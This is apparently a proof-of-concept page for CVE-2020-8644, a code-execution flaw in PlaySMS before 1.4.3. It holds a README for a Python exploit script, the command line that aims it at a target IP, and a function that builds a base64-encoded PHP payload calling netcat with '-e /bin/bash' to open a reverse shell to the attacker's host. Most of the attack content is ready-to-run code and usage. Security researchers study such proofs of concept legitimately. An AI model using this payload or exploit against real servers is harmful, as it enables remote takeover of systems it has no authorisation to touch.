
CVE-2020-8644 PoC — PlaySMS Input Validation Error Vulnerability

Source
Associated Vulnerability
Title: PlaySMS Input Validation Error Vulnerability (CVE-2020-8644)
Description: PlaySMS versions before 1.4.3 contain an input validation error vulnerability caused by the program failing to sanitize malicious strings. An attacker can exploit this vulnerability to execute arbitrary code.
Description
Python script to exploit PlaySMS before 1.4.3
Readme
# CVE-2020-8644-PlaySMS-1.4
Python script to exploit PlaySMS before 1.4.3

## Execution

Open a port on your machine:

![Open port with nc](/img/nc.png)

Then execute exploit.py:

![Execution](/img/execution.png)

```
./exploit.py <target-ip> <target-port> <your-ip> <your-open-port>
```

## Changing the exploit

You may want to change the reverse shell created by exploit.py.

To do this, you can change the function `create_revshell_encoded` on lines 14 to 19 of exploit.py:

```
def create_revshell_encoded(lhost,lport):
    # Change if you need
    revshell = "/*<?php /**/ system('/bin/nc.traditional "+lhost + " " + lport + " -e /bin/bash');"
    revshell_encoded = base64_encode(revshell)
    revshell_encoded = revshell_encoded.split('=')[0]
    return revshell_encoded
```

This code was developed to exploit a specific scenario where the target machine had `/bin/nc.traditional` available.
File Snapshot

```
[4.0K] /data/pocs/3c792c22357540edfa062ae0b8f8018d78ddbacc
├── [3.0K] exploit.py
├── [4.0K] img
│   ├── [ 53K] execution.png
│   └── [ 13K] nc.png
└── [ 911] README.md

1 directory, 4 files
```